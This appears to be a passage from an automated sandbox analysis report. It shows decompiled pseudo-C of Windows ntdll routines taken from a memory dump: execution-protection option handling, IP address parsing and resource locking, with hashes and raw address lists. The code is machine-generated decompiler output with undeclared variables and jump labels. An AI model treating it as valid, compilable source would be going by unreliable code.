                                                                                        							_t62 = E01F58375(_t71, 0x20);
                                                                                        							_pop(_t69);
                                                                                        							__eflags = _t62;
                                                                                        							if(__eflags != 0) {
                                                                                        								__eflags = 0;
                                                                                        								 *_t62 = 0;
                                                                                        							}
                                                                                        							E01F93F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                        							_t77 = _t77 + 0x10;
                                                                                        							E01FBE8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                        							__eflags = _t62;
                                                                                        							if(_t62 == 0) {
                                                                                        								goto L1;
                                                                                        							}
                                                                                        							_t31 = _t62 + 2; // 0x2
                                                                                        							_t71 = _t31;
                                                                                        							__eflags = _t71 - _v552;
                                                                                        							if(_t71 >= _v552) {
                                                                                        								goto L1;
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                        					_push(3);
                                                                                        					_push(0x55);
                                                                                        					E01F93F92();
                                                                                        					_t38 = 1;
                                                                                        					L2:
                                                                                        					return E01F4E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                        				}
                                                                                        				L1:
                                                                                        				_t38 = 0;
                                                                                        				goto L2;
                                                                                        			}




























                                                                                        APIs
                                                                                        • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 01F93F12
                                                                                        Strings
                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01F93F75
                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01F9E345
                                                                                        • ExecuteOptions, xrefs: 01F93F04
                                                                                        • `'t, xrefs: 01F77F1E
                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01F9E2FB
                                                                                        • Execute=1, xrefs: 01F93F5E
                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01F93F4A
                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01F93EC4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: BaseDataModuleQuery
                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$`'t
                                                                                        • API String ID: 3901378454-2063213820
                                                                                        • Opcode ID: 281e80a2e66abd55ace26ae02270eaa5cebc1f1996312db808df38fb8545bfc2
                                                                                        • Instruction ID: 189721614aaea2417b5dd9be65d94d09ff73df50ae8487757d0fb9ae52699ed8
                                                                                        • Opcode Fuzzy Hash: 281e80a2e66abd55ace26ae02270eaa5cebc1f1996312db808df38fb8545bfc2
                                                                                        • Instruction Fuzzy Hash: C741DC71A4020DBBEF20EA95DCC9FDA77BCAB14704F0005AEF605E6041E772DA468BA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E01F80B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                        				signed int _v8;
                                                                                        				signed int _v12;
                                                                                        				signed int _v16;
                                                                                        				signed int _v20;
                                                                                        				signed int _v24;
                                                                                        				signed int _v28;
                                                                                        				signed int _v32;
                                                                                        				void* _t108;
                                                                                        				void* _t116;
                                                                                        				char _t120;
                                                                                        				short _t121;
                                                                                        				void* _t128;
                                                                                        				intOrPtr* _t130;
                                                                                        				char _t132;
                                                                                        				short _t133;
                                                                                        				intOrPtr _t141;
                                                                                        				signed int _t156;
                                                                                        				signed int _t174;
                                                                                        				intOrPtr _t177;
                                                                                        				intOrPtr* _t179;
                                                                                        				intOrPtr _t180;
                                                                                        				void* _t183;
                                                                                        
                                                                                        				_t179 = _a4;
                                                                                        				_t141 =  *_t179;
                                                                                        				_v16 = 0;
                                                                                        				_v28 = 0;
                                                                                        				_v8 = 0;
                                                                                        				_v24 = 0;
                                                                                        				_v12 = 0;
                                                                                        				_v32 = 0;
                                                                                        				_v20 = 0;
                                                                                        				if(_t141 == 0) {
                                                                                        					L41:
                                                                                        					 *_a8 = _t179;
                                                                                        					_t180 = _v24;
                                                                                        					if(_t180 != 0) {
                                                                                        						if(_t180 != 3) {
                                                                                        							goto L6;
                                                                                        						}
                                                                                        						_v8 = _v8 + 1;
                                                                                        					}
                                                                                        					_t174 = _v32;
                                                                                        					if(_t174 == 0) {
                                                                                        						if(_v8 == 7) {
                                                                                        							goto L43;
                                                                                        						}
                                                                                        						goto L6;
                                                                                        					}
                                                                                        					L43:
                                                                                        					if(_v16 != 1) {
                                                                                        						if(_v16 != 2) {
                                                                                        							goto L6;
                                                                                        						}
                                                                                        						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                        						L47:
                                                                                        						if(_t174 != 0) {
                                                                                        							E01F58980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                        							_t116 = 8;
                                                                                        							E01F4DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                        						}
                                                                                        						return 0;
                                                                                        					}
                                                                                        					if(_t180 != 0) {
                                                                                        						if(_v12 > 3) {
                                                                                        							goto L6;
                                                                                        						}
                                                                                        						_t120 = E01F80CFA(_v28, 0, 0xa);
                                                                                        						_t183 = _t183 + 0xc;
                                                                                        						if(_t120 > 0xff) {
                                                                                        							goto L6;
                                                                                        						}
                                                                                        						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                        						goto L47;
                                                                                        					}
                                                                                        					if(_v12 > 4) {
                                                                                        						goto L6;
                                                                                        					}
                                                                                        					_t121 = E01F80CFA(_v28, _t180, 0x10);
                                                                                        					_t183 = _t183 + 0xc;
                                                                                        					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                        					goto L47;
                                                                                        				} else {
                                                                                        					while(1) {
                                                                                        						_t123 = _v16;
                                                                                        						if(_t123 == 0) {
                                                                                        							goto L7;
                                                                                        						}
                                                                                        						_t108 = _t123 - 1;
                                                                                        						if(_t108 != 0) {
                                                                                        							goto L1;
                                                                                        						}
                                                                                        						_t178 = _t141;
                                                                                        						if(E01F806BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                        							if(E01F806BA(_t135, _t178) == 0 || E01F80A5B(_t136, _t178) == 0) {
                                                                                        								if(_t141 != 0x3a) {
                                                                                        									if(_t141 == 0x2e) {
                                                                                        										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                        											goto L41;
                                                                                        										} else {
                                                                                        											_v24 = _v24 + 1;
                                                                                        											L27:
                                                                                        											_v16 = _v16 & 0x00000000;
                                                                                        											L28:
                                                                                        											if(_v28 == 0) {
                                                                                        												goto L20;
                                                                                        											}
                                                                                        											_t177 = _v24;
                                                                                        											if(_t177 != 0) {
                                                                                        												if(_v12 > 3) {
                                                                                        													L6:
                                                                                        													return 0xc000000d;
                                                                                        												}
                                                                                        												_t132 = E01F80CFA(_v28, 0, 0xa);
                                                                                        												_t183 = _t183 + 0xc;
                                                                                        												if(_t132 > 0xff) {
                                                                                        													goto L6;
                                                                                        												}
                                                                                        												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                        												goto L20;
                                                                                        											}
                                                                                        											if(_v12 > 4) {
                                                                                        												goto L6;
                                                                                        											}
                                                                                        											_t133 = E01F80CFA(_v28, 0, 0x10);
                                                                                        											_t183 = _t183 + 0xc;
                                                                                        											_v20 = _v20 + 1;
                                                                                        											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                        											goto L20;
                                                                                        										}
                                                                                        									}
                                                                                        									goto L41;
                                                                                        								}
                                                                                        								if(_v24 > 0 || _v8 > 6) {
                                                                                        									goto L41;
                                                                                        								} else {
                                                                                        									_t130 = _t179 + 1;
                                                                                        									if( *_t130 == _t141) {
                                                                                        										if(_v32 != 0) {
                                                                                        											goto L41;
                                                                                        										}
                                                                                        										_v32 = _v8 + 1;
                                                                                        										_t156 = 2;
                                                                                        										_v8 = _v8 + _t156;
                                                                                        										L34:
                                                                                        										_t179 = _t130;
                                                                                        										_v16 = _t156;
                                                                                        										goto L28;
                                                                                        									}
                                                                                        									_v8 = _v8 + 1;
                                                                                        									goto L27;
                                                                                        								}
                                                                                        							} else {
                                                                                        								_v12 = _v12 + 1;
                                                                                        								if(_v24 > 0) {
                                                                                        									goto L41;
                                                                                        								}
                                                                                        								_a7 = 1;
                                                                                        								goto L20;
                                                                                        							}
                                                                                        						} else {
                                                                                        							_v12 = _v12 + 1;
                                                                                        							L20:
                                                                                        							_t179 = _t179 + 1;
                                                                                        							_t141 =  *_t179;
                                                                                        							if(_t141 == 0) {
                                                                                        								goto L41;
                                                                                        							}
                                                                                        							continue;
                                                                                        						}
                                                                                        						L7:
                                                                                        						if(_t141 == 0x3a) {
                                                                                        							if(_v24 > 0 || _v8 > 0) {
                                                                                        								goto L41;
                                                                                        							} else {
                                                                                        								_t130 = _t179 + 1;
                                                                                        								if( *_t130 != _t141) {
                                                                                        									goto L41;
                                                                                        								}
                                                                                        								_v20 = _v20 + 1;
                                                                                        								_t156 = 2;
                                                                                        								_v32 = 1;
                                                                                        								_v8 = _t156;
                                                                                        								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                        								goto L34;
                                                                                        							}
                                                                                        						}
                                                                                        						L8:
                                                                                        						if(_v8 > 7) {
                                                                                        							goto L41;
                                                                                        						}
                                                                                        						_t142 = _t141;
                                                                                        						if(E01F806BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                        							if(E01F806BA(_t124, _t142) == 0 || E01F80A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                        								goto L41;
                                                                                        							} else {
                                                                                        								_t128 = 1;
                                                                                        								_a7 = 1;
                                                                                        								_v28 = _t179;
                                                                                        								_v16 = 1;
                                                                                        								_v12 = 1;
                                                                                        								L39:
                                                                                        								if(_v16 == _t128) {
                                                                                        									goto L20;
                                                                                        								}
                                                                                        								goto L28;
                                                                                        							}
                                                                                        						} else {
                                                                                        							_a7 = 0;
                                                                                        							_v28 = _t179;
                                                                                        							_v16 = 1;
                                                                                        							_v12 = 1;
                                                                                        							goto L20;
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        				L1:
                                                                                        				_t123 = _t108 == 1;
                                                                                        				if(_t108 == 1) {
                                                                                        					goto L8;
                                                                                        				}
                                                                                        				_t128 = 1;
                                                                                        				goto L39;
                                                                                        			}

























                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: __fassign
                                                                                        • String ID: .$:$:
                                                                                        • API String ID: 3965848254-2308638275
                                                                                        • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                        • Instruction ID: 198654b0bcc1f45c31b3aee8ca4b48d81a42d0f3aeee7712a3b9d39b818817a2
                                                                                        • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                        • Instruction Fuzzy Hash: 45A1C171D0030ADFEF25EF58C8456BEBBB4AF06304FA4846AF812A7241DF365649CB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 49%
                                                                                        			E01F80554(signed int _a4, char _a8) {
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				signed int* _t49;
                                                                                        				signed int _t51;
                                                                                        				signed int _t56;
                                                                                        				signed int _t58;
                                                                                        				signed int _t61;
                                                                                        				signed int _t63;
                                                                                        				void* _t66;
                                                                                        				intOrPtr _t67;
                                                                                        				signed int _t70;
                                                                                        				void* _t75;
                                                                                        				signed int _t81;
                                                                                        				signed int _t84;
                                                                                        				void* _t86;
                                                                                        				signed int _t93;
                                                                                        				signed int _t96;
                                                                                        				intOrPtr _t105;
                                                                                        				signed int _t107;
                                                                                        				void* _t110;
                                                                                        				signed int _t115;
                                                                                        				signed int* _t119;
                                                                                        				void* _t125;
                                                                                        				void* _t126;
                                                                                        				signed int _t128;
                                                                                        				signed int _t130;
                                                                                        				signed int _t138;
                                                                                        				signed int _t144;
                                                                                        				void* _t158;
                                                                                        				void* _t159;
                                                                                        				void* _t160;
                                                                                        
                                                                                        				_t96 = _a4;
                                                                                        				_t115 =  *(_t96 + 0x28);
                                                                                        				_push(_t138);
                                                                                        				if(_t115 < 0) {
                                                                                        					_t105 =  *[fs:0x18];
                                                                                        					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                                        					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                        						goto L6;
                                                                                        					} else {
                                                                                        						__eflags = _t115 | 0xffffffff;
                                                                                        						asm("lock xadd [eax], edx");
                                                                                        						return 1;
                                                                                        					}
                                                                                        				} else {
                                                                                        					L6:
                                                                                        					_push(_t128);
                                                                                        					while(1) {
                                                                                        						L7:
                                                                                        						__eflags = _t115;
                                                                                        						if(_t115 >= 0) {
                                                                                        							break;
                                                                                        						}
                                                                                        						__eflags = _a8;
                                                                                        						if(_a8 == 0) {
                                                                                        							__eflags = 0;
                                                                                        							return 0;
                                                                                        						} else {
                                                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                        							_t49 = _t96 + 0x1c;
                                                                                        							_t106 = 1;
                                                                                        							asm("lock xadd [edx], ecx");
                                                                                        							_t115 =  *(_t96 + 0x28);
                                                                                        							__eflags = _t115;
                                                                                        							if(_t115 < 0) {
                                                                                        								L23:
                                                                                        								_t130 = 0;
                                                                                        								__eflags = 0;
                                                                                        								while(1) {
                                                                                        									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                                        									asm("sbb esi, esi");
                                                                                        									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020201c0;
                                                                                        									_push(_t144);
                                                                                        									_push(0);
                                                                                        									_t51 = E01F3F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                                        									__eflags = _t51 - 0x102;
                                                                                        									if(_t51 != 0x102) {
                                                                                        										break;
                                                                                        									}
                                                                                        									_t106 =  *(_t144 + 4);
                                                                                        									_t126 =  *_t144;
                                                                                        									_t86 = E01F84FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                                        									_push(_t126);
                                                                                        									_push(_t86);
                                                                                        									E01F93F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                                        									E01F93F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                        									_t130 = _t130 + 1;
                                                                                        									_t160 = _t158 + 0x28;
                                                                                        									__eflags = _t130 - 2;
                                                                                        									if(__eflags > 0) {
                                                                                        										E01FC217A(_t106, __eflags, _t96);
                                                                                        									}
                                                                                        									_push("RTL: Re-Waiting\n");
                                                                                        									_push(0);
                                                                                        									_push(0x65);
                                                                                        									E01F93F92();
                                                                                        									_t158 = _t160 + 0xc;
                                                                                        								}
                                                                                        								__eflags = _t51;
                                                                                        								if(__eflags < 0) {
                                                                                        									_push(_t51);
                                                                                        									E01F83915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                                        									asm("int3");
                                                                                        									while(1) {
                                                                                        										L32:
                                                                                        										__eflags = _a8;
                                                                                        										if(_a8 == 0) {
                                                                                        											break;
                                                                                        										}
                                                                                        										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                        										_t119 = _t96 + 0x24;
                                                                                        										_t107 = 1;
                                                                                        										asm("lock xadd [eax], ecx");
                                                                                        										_t56 =  *(_t96 + 0x28);
                                                                                        										_a4 = _t56;
                                                                                        										__eflags = _t56;
                                                                                        										if(_t56 != 0) {
                                                                                        											L40:
                                                                                        											_t128 = 0;
                                                                                        											__eflags = 0;
                                                                                        											while(1) {
                                                                                        												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                                        												asm("sbb esi, esi");
                                                                                        												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020201c0;
                                                                                        												_push(_t138);
                                                                                        												_push(0);
                                                                                        												_t58 = E01F3F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                                        												__eflags = _t58 - 0x102;
                                                                                        												if(_t58 != 0x102) {
                                                                                        													break;
                                                                                        												}
                                                                                        												_t107 =  *(_t138 + 4);
                                                                                        												_t125 =  *_t138;
                                                                                        												_t75 = E01F84FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                                        												_push(_t125);
                                                                                        												_push(_t75);
                                                                                        												E01F93F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                                        												E01F93F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                        												_t128 = _t128 + 1;
                                                                                        												_t159 = _t158 + 0x28;
                                                                                        												__eflags = _t128 - 2;
                                                                                        												if(__eflags > 0) {
                                                                                        													E01FC217A(_t107, __eflags, _t96);
                                                                                        												}
                                                                                        												_push("RTL: Re-Waiting\n");
                                                                                        												_push(0);
                                                                                        												_push(0x65);
                                                                                        												E01F93F92();
                                                                                        												_t158 = _t159 + 0xc;
                                                                                        											}
                                                                                        											__eflags = _t58;
                                                                                        											if(__eflags < 0) {
                                                                                        												_push(_t58);
                                                                                        												E01F83915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                                        												asm("int3");
                                                                                        												_t61 =  *_t107;
                                                                                        												 *_t107 = 0;
                                                                                        												__eflags = _t61;
                                                                                        												if(_t61 == 0) {
                                                                                        													L1:
                                                                                        													_t63 = E01F65384(_t138 + 0x24);
                                                                                        													if(_t63 != 0) {
                                                                                        														goto L52;
                                                                                        													} else {
                                                                                        														goto L2;
                                                                                        													}
                                                                                        												} else {
                                                                                        													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                                        													_push( &_a4);
                                                                                        													_push(_t61);
                                                                                        													_t70 = E01F3F970( *((intOrPtr*)(_t138 + 0x18)));
                                                                                        													__eflags = _t70;
                                                                                        													if(__eflags >= 0) {
                                                                                        														goto L1;
                                                                                        													} else {
                                                                                        														_push(_t70);
                                                                                        														E01F83915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                                        														L52:
                                                                                        														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                        														_push( &_a4);
                                                                                        														_push(1);
                                                                                        														_t63 = E01F3F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                        														__eflags = _t63;
                                                                                        														if(__eflags >= 0) {
                                                                                        															L2:
                                                                                        															return _t63;
                                                                                        														} else {
                                                                                        															_push(_t63);
                                                                                        															E01F83915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                                        															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                        															_push( &_a4);
                                                                                        															_push(1);
                                                                                        															_t63 = E01F3F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                        															__eflags = _t63;
                                                                                        															if(__eflags >= 0) {
                                                                                        																goto L2;
                                                                                        															} else {
                                                                                        																_push(_t63);
                                                                                        																_t66 = E01F83915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                                        																asm("int3");
                                                                                        																while(1) {
                                                                                        																	_t110 = _t66;
                                                                                        																	__eflags = _t66 - 1;
                                                                                        																	if(_t66 != 1) {
                                                                                        																		break;
                                                                                        																	}
                                                                                        																	_t128 = _t128 | 0xffffffff;
                                                                                        																	_t66 = _t110;
                                                                                        																	asm("lock cmpxchg [ebx], edi");
                                                                                        																	__eflags = _t66 - _t110;
                                                                                        																	if(_t66 != _t110) {
                                                                                        																		continue;
                                                                                        																	} else {
                                                                                        																		_t67 =  *[fs:0x18];
                                                                                        																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                                        																		return _t67;
                                                                                        																	}
                                                                                        																	goto L58;
                                                                                        																}
                                                                                        																E01F65329(_t110, _t138);
                                                                                        																return E01F653A5(_t138, 1);
                                                                                        															}
                                                                                        														}
                                                                                        													}
                                                                                        												}
                                                                                        											} else {
                                                                                        												_t56 =  *(_t96 + 0x28);
                                                                                        												goto L3;
                                                                                        											}
                                                                                        										} else {
                                                                                        											_t107 =  *_t119;
                                                                                        											__eflags = _t107;
                                                                                        											if(__eflags > 0) {
                                                                                        												while(1) {
                                                                                        													_t81 = _t107;
                                                                                        													asm("lock cmpxchg [edi], esi");
                                                                                        													__eflags = _t81 - _t107;
                                                                                        													if(_t81 == _t107) {
                                                                                        														break;
                                                                                        													}
                                                                                        													_t107 = _t81;
                                                                                        													__eflags = _t81;
                                                                                        													if(_t81 > 0) {
                                                                                        														continue;
                                                                                        													}
                                                                                        													break;
                                                                                        												}
                                                                                        												_t56 = _a4;
                                                                                        												__eflags = _t107;
                                                                                        											}
                                                                                        											if(__eflags != 0) {
                                                                                        												while(1) {
                                                                                        													L3:
                                                                                        													__eflags = _t56;
                                                                                        													if(_t56 != 0) {
                                                                                        														goto L32;
                                                                                        													}
                                                                                        													_t107 = _t107 | 0xffffffff;
                                                                                        													_t56 = 0;
                                                                                        													asm("lock cmpxchg [edx], ecx");
                                                                                        													__eflags = 0;
                                                                                        													if(0 != 0) {
                                                                                        														continue;
                                                                                        													} else {
                                                                                        														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                        														return 1;
                                                                                        													}
                                                                                        													goto L58;
                                                                                        												}
                                                                                        												continue;
                                                                                        											} else {
                                                                                        												goto L40;
                                                                                        											}
                                                                                        										}
                                                                                        										goto L58;
                                                                                        									}
                                                                                        									__eflags = 0;
                                                                                        									return 0;
                                                                                        								} else {
                                                                                        									_t115 =  *(_t96 + 0x28);
                                                                                        									continue;
                                                                                        								}
                                                                                        							} else {
                                                                                        								_t106 =  *_t49;
                                                                                        								__eflags = _t106;
                                                                                        								if(__eflags > 0) {
                                                                                        									while(1) {
                                                                                        										_t93 = _t106;
                                                                                        										asm("lock cmpxchg [edi], esi");
                                                                                        										__eflags = _t93 - _t106;
                                                                                        										if(_t93 == _t106) {
                                                                                        											break;
                                                                                        										}
                                                                                        										_t106 = _t93;
                                                                                        										__eflags = _t93;
                                                                                        										if(_t93 > 0) {
                                                                                        											continue;
                                                                                        										}
                                                                                        										break;
                                                                                        									}
                                                                                        									__eflags = _t106;
                                                                                        								}
                                                                                        								if(__eflags != 0) {
                                                                                        									continue;
                                                                                        								} else {
                                                                                        									goto L23;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        						goto L58;
                                                                                        					}
                                                                                        					_t84 = _t115;
                                                                                        					asm("lock cmpxchg [esi], ecx");
                                                                                        					__eflags = _t84 - _t115;
                                                                                        					if(_t84 != _t115) {
                                                                                        						_t115 = _t84;
                                                                                        						goto L7;
                                                                                        					} else {
                                                                                        						return 1;
                                                                                        					}
                                                                                        				}
                                                                                        				L58:
                                                                                        			}



































                                                                                        0x01fa2243
                                                                                        0x01fa2248
                                                                                        0x01fa2248
                                                                                        0x01fa224d
                                                                                        0x01fa224f
                                                                                        0x01fa2262
                                                                                        0x01fa2263
                                                                                        0x01fa2268
                                                                                        0x01fa2269
                                                                                        0x01fa2269
                                                                                        0x01fa2269
                                                                                        0x01fa226d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa2276
                                                                                        0x01fa2279
                                                                                        0x01fa227e
                                                                                        0x01fa2283
                                                                                        0x01fa2287
                                                                                        0x01fa228a
                                                                                        0x01fa228d
                                                                                        0x01fa228f
                                                                                        0x01fa22bc
                                                                                        0x01fa22bc
                                                                                        0x01fa22bc
                                                                                        0x01fa22be
                                                                                        0x01fa22c4
                                                                                        0x01fa22cc
                                                                                        0x01fa22d0
                                                                                        0x01fa22d6
                                                                                        0x01fa22d7
                                                                                        0x01fa22da
                                                                                        0x01fa22df
                                                                                        0x01fa22e4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa22e6
                                                                                        0x01fa22e9
                                                                                        0x01fa22f4
                                                                                        0x01fa22f9
                                                                                        0x01fa22fa
                                                                                        0x01fa2305
                                                                                        0x01fa2314
                                                                                        0x01fa2319
                                                                                        0x01fa231a
                                                                                        0x01fa231d
                                                                                        0x01fa2320
                                                                                        0x01fa2323
                                                                                        0x01fa2323
                                                                                        0x01fa2328
                                                                                        0x01fa232d
                                                                                        0x01fa232f
                                                                                        0x01fa2331
                                                                                        0x01fa2336
                                                                                        0x01fa2336
                                                                                        0x01fa233b
                                                                                        0x01fa233d
                                                                                        0x01fa2350
                                                                                        0x01fa2351
                                                                                        0x01fa2356
                                                                                        0x01fa2359
                                                                                        0x01fa2359
                                                                                        0x01fa235b
                                                                                        0x01fa235d
                                                                                        0x01f65367
                                                                                        0x01f6536b
                                                                                        0x01f65372
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa2363
                                                                                        0x01fa2363
                                                                                        0x01fa2369
                                                                                        0x01fa236a
                                                                                        0x01fa236c
                                                                                        0x01fa2371
                                                                                        0x01fa2373
                                                                                        0x00000000
                                                                                        0x01fa2379
                                                                                        0x01fa2379
                                                                                        0x01fa237a
                                                                                        0x01fa237f
                                                                                        0x01fa237f
                                                                                        0x01fa2385
                                                                                        0x01fa2386
                                                                                        0x01fa2389
                                                                                        0x01fa238e
                                                                                        0x01fa2390
                                                                                        0x01f65378
                                                                                        0x01f6537c
                                                                                        0x01fa2396
                                                                                        0x01fa2396
                                                                                        0x01fa2397
                                                                                        0x01fa239c
                                                                                        0x01fa23a2
                                                                                        0x01fa23a3
                                                                                        0x01fa23a6
                                                                                        0x01fa23ab
                                                                                        0x01fa23ad
                                                                                        0x00000000
                                                                                        0x01fa23b3
                                                                                        0x01fa23b3
                                                                                        0x01fa23b4
                                                                                        0x01fa23b9
                                                                                        0x01fa23ba
                                                                                        0x01fa23ba
                                                                                        0x01fa23bc
                                                                                        0x01fa23bf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f99153
                                                                                        0x01f99158
                                                                                        0x01f9915a
                                                                                        0x01f9915e
                                                                                        0x01f99160
                                                                                        0x00000000
                                                                                        0x01f99166
                                                                                        0x01f99166
                                                                                        0x01f99171
                                                                                        0x01f99176
                                                                                        0x01f99176
                                                                                        0x00000000
                                                                                        0x01f99160
                                                                                        0x01fa23c6
                                                                                        0x01fa23d7
                                                                                        0x01fa23d7
                                                                                        0x01fa23ad
                                                                                        0x01fa2390
                                                                                        0x01fa2373
                                                                                        0x01fa233f
                                                                                        0x01fa233f
                                                                                        0x00000000
                                                                                        0x01fa233f
                                                                                        0x01fa2291
                                                                                        0x01fa2291
                                                                                        0x01fa2293
                                                                                        0x01fa2295
                                                                                        0x01fa229a
                                                                                        0x01fa22a1
                                                                                        0x01fa22a3
                                                                                        0x01fa22a7
                                                                                        0x01fa22a9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa22ab
                                                                                        0x01fa22ad
                                                                                        0x01fa22af
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa22af
                                                                                        0x01fa22b1
                                                                                        0x01fa22b4
                                                                                        0x01fa22b4
                                                                                        0x01fa22b6
                                                                                        0x01f653be
                                                                                        0x01f653be
                                                                                        0x01f653be
                                                                                        0x01f653c0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f653cb
                                                                                        0x01f653ce
                                                                                        0x01f653d0
                                                                                        0x01f653d4
                                                                                        0x01f653d6
                                                                                        0x00000000
                                                                                        0x01f653d8
                                                                                        0x01f653e3
                                                                                        0x01f653ea
